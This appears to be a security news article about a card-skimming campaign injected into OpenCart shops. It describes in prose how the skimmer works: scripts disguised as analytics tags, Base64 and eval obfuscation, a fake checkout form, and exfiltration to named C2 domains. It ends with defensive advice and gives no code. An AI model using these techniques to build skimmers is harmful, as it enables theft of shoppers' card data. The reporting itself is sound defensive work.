Understanding the New Magecart-Style Attack on OpenCart Websites
A recent cybersecurity threat has emerged, targeting e-commerce websites that use the OpenCart content management system (CMS). This attack is reminiscent of the well-known Magecart attacks, where malicious code is injected into websites to steal sensitive customer data. In this case, the attackers have managed to inject malware that mimics trusted tracking scripts, making it particularly difficult to detect.
The malware is hidden within analytics tags and marketing scripts such as Facebook Pixel, Meta Pixel, and Google Tag Manager. These are commonly used by legitimate businesses to track user behavior and improve their online presence. However, in this instance, the scripts have been tampered with to serve a different purpose: stealing user information.
Obfuscation Techniques and Script Injection
One of the key methods used by the attackers is obfuscation, which makes it harder for security tools to identify malicious code. The malicious JavaScript is encoded using Base64 and routed through suspicious domains such as /tagscart.shop/cdn/analytics.min.js. At first glance, the script appears to be a standard Google Analytics or Tag Manager script, but further inspection reveals its true nature.
Once decoded and executed, the script dynamically creates a new element and inserts it before existing scripts. This allows the malware to run additional code without triggering immediate alerts. The script then executes heavily obfuscated code, utilizing techniques like hexadecimal references, array recombination, and the eval() function for dynamic decoding.
Fake Payment Forms and Data Exfiltration
The primary function of this script is to inject a fake credit card form during checkout. This form is designed to look legitimate, capturing input across the credit card number, expiration date, and CVC. Listeners are attached to events such as blur, keydown, and paste, ensuring that every piece of user input is captured.
Importantly, the attack does not rely on clipboard scraping, meaning users must manually enter their card details. After submission, the stolen data is immediately exfiltrated via POST requests to two command-and-control (C2) domains: //ultracart[.]shop/g.php and //hxjet.pics/g.php.
In an added twist, the original payment form is hidden once the card information is submitted. A second page then prompts users to enter further bank transaction details, compounding the threat.
Delayed Use of Stolen Card Data
What sets this attack apart is the unusually long delay in using the stolen card data. Instead of being used within a few days, as is typical, the data was utilized several months after the breach. One card was used on June 18 in a pay-by-phone transaction from the US, while another was charged €47.80 to an unidentified vendor.
This delay highlights the sophistication of the attack and the potential for prolonged damage. It also underscores the need for stronger security measures beyond basic firewalls.
The Growing Risk in SaaS-Based E-Commerce
This breach demonstrates the growing risk in SaaS-based e-commerce, where CMS platforms like OpenCart become soft targets for advanced malware. As more businesses rely on these platforms, the importance of robust security measures cannot be overstated.
Automated platforms like c/side claim to detect threats by identifying obfuscated JavaScript, unauthorized form injections, and anomalous script behavior. As attackers continue to evolve, even small CMS deployments must remain vigilant. Real-time monitoring and threat intelligence should no longer be optional for e-commerce vendors seeking to secure their customers’ trust.
Recommendations for E-Commerce Vendors
To protect against such threats, e-commerce vendors should consider implementing the following measures:
- Regularly update and patch their CMS and any third-party plugins.
- Monitor for unusual activity, including unexpected script behavior.
- Implement real-time monitoring tools that can detect obfuscated JavaScript and unauthorized form injections.
- Educate employees and developers about the risks of malware and how to identify suspicious activity.
- Stay informed about the latest cybersecurity trends and threats.
By taking these steps, e-commerce businesses can better defend themselves against increasingly sophisticated attacks and protect their customers’ sensitive information.